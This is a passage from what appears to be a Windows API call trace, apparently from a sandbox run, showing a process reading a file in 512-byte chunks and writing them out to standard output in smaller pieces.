0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.625] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] GetFileType (hFile=0x4c) returned 0x1 [0130.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.625] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] GetFileType (hFile=0x4c) returned 0x1 [0130.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.626] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.626] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] GetFileType (hFile=0x4c) returned 0x1 [0130.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.627] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.628] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.628] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] GetFileType (hFile=0x4c) returned 0x1 [0130.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.732] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.732] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] GetFileType (hFile=0x4c) returned 0x1 [0130.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.733] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.733] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] GetFileType (hFile=0x4c) returned 0x1 [0130.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.734] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.735] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] GetFileType (hFile=0x4c) returned 0x1 [0130.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.735] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.736] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x200, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eda8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22edf8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee48*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ee98*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] GetFileType (hFile=0x4c) returned 0x1 [0130.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.736] WriteFile (in: hFile=0x4c, lpBuffer=0x22eee8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22eee8*, lpNumberOfBytesWritten=0x22df3c*=0x50, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef38*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ef38*, lpNumberOfBytesWritten=0x22df3c*=0x20, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df28 | out: lpNewFilePointer=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0130.737] ReadFile (in: hFile=0x54, lpBuffer=0x22ed58, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df48, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesRead=0x22df48*=0x32, lpOverlapped=0x0) returned 1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] GetFileType (hFile=0x4c) returned 0x1 [0130.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0130.737] WriteFile (in: hFile=0x4c, lpBuffer=0x22ed58*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22df3c, lpOverlapped=0x0 | out: lpBuffer=0x22ed58*, lpNumberOfBytesWritten=0x22df3c*=0x32, lpOverlapped=0x0) returned 1 [0130.737] 